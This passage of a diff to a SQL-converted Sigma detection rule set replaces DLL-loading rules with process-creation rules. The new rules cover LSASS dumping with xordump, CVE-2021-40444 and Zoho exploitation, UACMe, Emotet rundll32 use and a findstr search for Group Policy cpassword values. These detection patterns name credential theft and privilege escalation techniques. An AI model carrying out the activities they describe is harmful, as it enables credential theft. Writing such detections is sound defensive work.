LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" @@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", @@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files 